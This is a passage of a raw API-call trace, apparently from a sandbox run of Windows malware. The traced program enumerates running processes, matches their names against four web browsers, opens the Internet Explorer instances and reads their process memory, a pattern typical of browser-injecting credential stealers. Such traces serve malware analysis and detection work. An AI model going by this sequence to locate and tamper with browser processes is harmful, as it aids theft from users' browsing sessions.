	[0255.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0255.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xb0a0
	[0255.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.747] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0255.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.748] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.748] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0255.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.748] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.748] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0255.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xb0a4
	[0255.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.749] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0255.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.750] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.750] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0255.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.751] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0255.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xb0a8
	[0255.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.752] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0255.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.752] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.753] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0255.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.754] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0255.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xb0ac
	[0255.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.755] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0255.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.755] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.756] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0255.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.756] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0255.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xb0b0
	[0255.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.758] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0255.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.758] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.759] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0255.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.760] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0255.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xb0b4
	[0255.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.762] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0255.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.762] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.763] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0255.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.763] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xb0b8
	[0255.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.765] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.765] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.765] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.766] NtQueryInformationProcess (in: ProcessHandle=0xb0b8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.766] ReadProcessMemory (in: hProcess=0xb0b8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.766] ReadProcessMemory (in: hProcess=0xb0b8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.766] ReadProcessMemory (in: hProcess=0xb0b8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.766] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xb0bc
	[0255.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.768] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.768] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.768] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.768] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.769] NtQueryInformationProcess (in: ProcessHandle=0xb0bc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.769] ReadProcessMemory (in: hProcess=0xb0bc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.769] ReadProcessMemory (in: hProcess=0xb0bc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.769] ReadProcessMemory (in: hProcess=0xb0bc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.769] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xb0c0
	[0255.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.770] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.771] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.771] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.771] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0255.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xb0c4
	[0255.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.773] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0255.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.773] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.773] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0255.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.774] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xb0c8
	[0255.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.775] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.775] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.776] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.776] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xb0cc
	[0255.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.778] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.778] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.779] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xb0d0
	[0255.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.780] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.780] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.781] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.781] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xb0d4
	[0255.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.782] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.782] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.783] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.783] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.783] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xb0d8
	[0255.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.784] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.784] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.785] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.785] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xb0dc
	[0255.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.786] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.787] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.787] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.787] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xb0e0
	[0255.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.788] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.789] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.789] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.789] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xb0e4
	[0255.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.790] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.791] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.791] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.791] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.792] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xb0e8
	[0255.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.792] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.793] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.793] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.793] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xb0ec
	[0255.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.794] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.795] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.795] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.795] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xb0f0
	[0255.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.796] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.797] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.797] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.797] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.797] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xb0f4
	[0255.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.798] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.799] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.799] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.799] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xb0f8
	[0255.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
